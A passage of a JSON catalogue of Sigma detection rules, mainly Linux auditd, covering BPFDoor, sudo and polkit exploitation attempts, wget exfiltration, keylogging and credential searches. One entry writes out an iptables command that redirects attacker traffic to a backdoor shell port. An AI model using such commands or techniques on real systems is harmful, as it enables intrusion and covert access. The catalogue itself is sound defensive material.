"7e4bfe58-4a47-4709-828d-d86c78b7cc1f", - "value": "Cleartext Protocol Usage Via Netflow", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/26", - "filename": "netflow_cleartext_protocols.yml", - "author": "Alexandr Yampolskyi, SOC Prime", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "No established product" - } - }, - { - "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", - "uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", - "value": "Locked Workstation", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/workstation_was_locked.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/26", - "filename": "workstation_was_locked.yml", - "author": "Alexandr Yampolskyi, SOC Prime", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects change of user environment. 
Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", - "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", - "value": "Edit of .bash_profile and .bashrc", - "meta": { - "refs": [ - "MITRE Attack technique T1156; .bash_profile and .bashrc. ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml" - ], - "tags": [ - "attack.s0003", - "attack.persistence", - "attack.t1546.004" - ], - "creation_date": "2019/05/12", - "filename": "lnx_auditd_alter_bash_profile.yml", - "author": "Peter Matkovski", - "level": "medium", - "falsepositive": [ - "Admin or User activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to record audio with arecord utility", - "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", - "value": "Audio Capture", - "meta": { - "refs": [ - "https://linux.die.net/man/1/arecord", - "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", - "https://attack.mitre.org/techniques/T1123/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ], - "creation_date": "2021/09/04", - "filename": "lnx_auditd_audio_capture.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detect changes in auditd configuration files", - "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", - "value": "Auditing Configuration Changes on Linux Host", - "meta": { - "refs": [ - "https://github.com/Neo23x0/auditd/blob/master/audit.rules", - "Self Experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.006" - 
], - "creation_date": "2019/10/25", - "filename": "lnx_auditd_auditing_config_change.yml", - "author": "Mikhail Larin, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n", - "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", - "value": "Binary Padding - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ], - "creation_date": "2020/10/13", - "filename": "lnx_auditd_binary_padding.yml", - "author": "Igor Fits, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate script work" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", - "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", - "value": "BPFDoor Abnormal Process ID or Lock File Accessed", - "meta": { - "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", - "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.t1059" - ], - "creation_date": "2022/08/10", - "filename": "lnx_auditd_bpfdoor_file_accessed.yml", - "author": "Rafal Piasecki", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No 
established category", - "logsource.product": "linux" - } - }, - { - "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", - "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", - "value": "Bpfdoor TCP Ports Redirect", - "meta": { - "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", - "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2022/08/10", - "filename": "lnx_auditd_bpfdoor_port_redirect.yml", - "author": "Rafal Piasecki", - "level": "medium", - "falsepositive": [ - "Legitimate ports redirect" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to discover the files with setuid/setgid capability on them. 
That would allow adversary to escalate their privileges.", - "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", - "value": "Linux Capabilities Discovery", - "meta": { - "refs": [ - "https://man7.org/linux/man-pages/man8/getcap.8.html", - "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", - "https://mn3m.info/posts/suid-vs-capabilities/", - "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" - ], - "tags": [ - "attack.collection", - "attack.privilege_escalation", - "attack.t1123", - "attack.t1548" - ], - "creation_date": "2021/11/28", - "filename": "lnx_auditd_capabilities_discovery.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detect file time attribute change to hide new or changes to existing files.", - "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", - "value": "File Time Attribute Change - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ], - "creation_date": "2020/10/15", - "filename": "lnx_auditd_change_file_time_attr.yml", - "author": "Igor Fits, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects removing immutable file attribute.", - "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", - "value": "Remove Immutable File Attribute - Auditd", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ], - "creation_date": "2019/09/23", - "filename": "lnx_auditd_chattr_immutable_removal.yml", - "author": "Jakob Weinzettl, oscd.community", - "level": "medium", - "falsepositive": [ - "Administrator interacting with immutable files (e.g. for instance backups)." - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", - "value": "Clipboard Collection with Xclip Tool - Auditd", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1115/", - "https://linux.die.net/man/1/xclip", - "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2021/09/24", - "filename": "lnx_auditd_clipboard_collection.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate usage of xclip tools" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "uuid": "f200dc3f-b219-425d-a17e-c38467364816", - 
"value": "Clipboard Collection of Image Data with Xclip Tool", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1115/", - "https://linux.die.net/man/1/xclip", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2021/10/01", - "filename": "lnx_auditd_clipboard_image_collection.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate usage of xclip tools" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects command line parameter very often used with coin miners", - "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", - "value": "Possible Coin Miner CPU Priority Param", - "meta": { - "refs": [ - "https://xmrig.com/docs/miner/command-line-options", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2021/10/09", - "filename": "lnx_auditd_coinminer.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Other tools that use a --cpu-priority flag" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects the creation of a new user account. 
Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", - "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", - "value": "Creation Of An User Account", - "meta": { - "refs": [ - "MITRE Attack technique T1136; Create Account ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" - ], - "tags": [ - "attack.t1136.001", - "attack.persistence" - ], - "creation_date": "2020/05/18", - "filename": "lnx_auditd_create_account.yml", - "author": "Marie Euler", - "level": "medium", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", - "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", - "value": "CVE-2021-3156 Exploitation Attempt", - "meta": { - "refs": [ - "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" - ], - "creation_date": "2021/02/01", - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", - "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", - "value": 
"CVE-2021-3156 Exploitation Attempt Bruteforcing", - "meta": { - "refs": [ - "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" - ], - "creation_date": "2021/02/01", - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-4034.", - "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", - "value": "CVE-2021-4034 Exploitation Attempt", - "meta": { - "refs": [ - "https://github.com/berdav/CVE-2021-4034", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", - "https://access.redhat.com/security/cve/CVE-2021-4034", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2022/01/27", - "filename": "lnx_auditd_cve_2021_4034.yml", - "author": "Pawel Mazur", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", - "value": "Data Compressed", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1560.001" - ], - "creation_date": "2019/10/21", - "filename": "lnx_auditd_data_compressed.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate use of archiving tools by legitimate user." - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", - "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", - "value": "Data Exfiltration with Wget", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0010/", - "https://linux.die.net/man/1/wget", - "https://gtfobins.github.io/gtfobins/wget/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2021/11/18", - "filename": "lnx_auditd_data_exfil_wget.yml", - "author": "Pawel Mazur", - "level": "medium", - "falsepositive": [ - "Legitimate usage of wget utility to post a file" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects overwriting (effectively wiping/deleting) of a file.", - "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", - "value": "Overwriting the File with Dev Zero or Null", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2019/10/23", - "filename": 
"lnx_auditd_dd_delete_file.yml", - "author": "Jakob Weinzettl, oscd.community", - "level": "low", - "falsepositive": [ - "Appending null bytes to files.", - "Legitimate overwrite of files." - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", - "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", - "value": "Disable System Firewall", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://attack.mitre.org/techniques/T1562/004/", - "https://firewalld.org/documentation/man-pages/firewall-cmd.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" - ], - "tags": [ - "attack.t1562.004", - "attack.defense_evasion" - ], - "creation_date": "2022/01/22", - "filename": "lnx_auditd_disable_system_firewall.yml", - "author": "Pawel Mazur", - "level": "high", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects file and folder permission changes.", - "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", - "value": "File or Folder Permissions Change", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ], - "creation_date": "2019/09/23", - "filename": "lnx_auditd_file_or_folder_permissions.yml", - "author": "Jakob Weinzettl, oscd.community", - "level": "low", - "falsepositive": [ - "User interacting with files permissions (normal/daily behaviour)." 
- ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detecting attempts to extract passwords with grep", - "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", - "value": "Credentials In Files - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2020/10/15", - "filename": "lnx_auditd_find_cred_in_files.yml", - "author": "Igor Fits, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", - "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", - "value": "Hidden Files and Directories", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", - "https://attack.mitre.org/techniques/T1564/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2021/09/06", - "filename": "lnx_auditd_hidden_files_directories.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects appending of zip file to image", - "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", - "value": "Steganography Hide Zip Information in Picture File", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", 
- "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ], - "creation_date": "2021/09/09", - "filename": "lnx_auditd_hidden_zip_files_steganography.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detect attempt to enable auditing of TTY input", - "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", - "value": "Linux Keylogging with Pam.d", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", - "https://attack.mitre.org/techniques/T1003/", - "https://linux.die.net/man/8/pam_tty_audit", - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", - "https://access.redhat.com/articles/4409591#audit-record-types-2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1056.001" - ], - "creation_date": "2021/05/24", - "filename": "lnx_auditd_keylogging_with_pam_d.yml", - "author": "Pawel Mazur", - "level": "high", - "falsepositive": [ - "Administrative work" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Identifies modification of ld.so.preload for shared object injection. 
This technique is used by attackers to load arbitrary code into processes.", - "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", - "value": "Modification of ld.so.preload", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", - "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.006" - ], - "creation_date": "2019/10/24", - "filename": "lnx_auditd_ld_so_preload_mod.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", - "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", - "value": "Loading of Kernel Module via Insmod", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1547/006/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", - "https://linux.die.net/man/8/insmod", - "https://man7.org/linux/man-pages/man8/kmod.8.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.006" - ], - "creation_date": "2021/11/02", - "filename": "lnx_auditd_load_module_insmod.yml", - "author": "Pawel Mazur", - "level": "high", - "falsepositive": [ - "Unknown" - ], - 
"logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detect changes of syslog daemons configuration files", - "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", - "value": "Logging Configuration Changes on Linux Host", - "meta": { - "refs": [ - "self experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.006" - ], - "creation_date": "2019/10/25", - "filename": "lnx_auditd_logging_config_change.yml", - "author": "Mikhail Larin, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", - "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", - "value": "Masquerading as Linux Crond Process", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/10/21", - "filename": "lnx_auditd_masquerading_crond.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects enumeration of local or remote network services.", - "uuid": "3761e026-f259-44e6-8826-719ed8079408", - "value": "Linux Network 
Service Scanning - Auditd", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2020/10/21", - "filename": "lnx_auditd_network_service_scanning.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", - "value": "Network Sniffing - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" - ], - "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" - ], - "creation_date": "2019/10/21", - "filename": "lnx_auditd_network_sniffing.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administrator or user uses network sniffing tool for legitimate reasons." 
- ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\nMicrosoft Azure, and Microsoft Operations Management Suite.\n", - "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", - "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd", - "meta": { - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://github.com/Azure/Azure-Sentinel/pull/3059", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" - ], - "creation_date": "2021/09/17", - "filename": "lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." 
- ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects password policy discovery commands", - "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", - "value": "Password Policy Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", - "https://attack.mitre.org/techniques/T1201/", - "https://linux.die.net/man/1/chage", - "https://man7.org/linux/man-pages/man1/passwd.1.html", - "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1201" - ], - "creation_date": "2020/10/08", - "filename": "lnx_auditd_password_policy_discovery.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community, Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects a reload or a start of a service.", - "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", - "value": "Systemd Service Reload or Start", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1543/002/", - 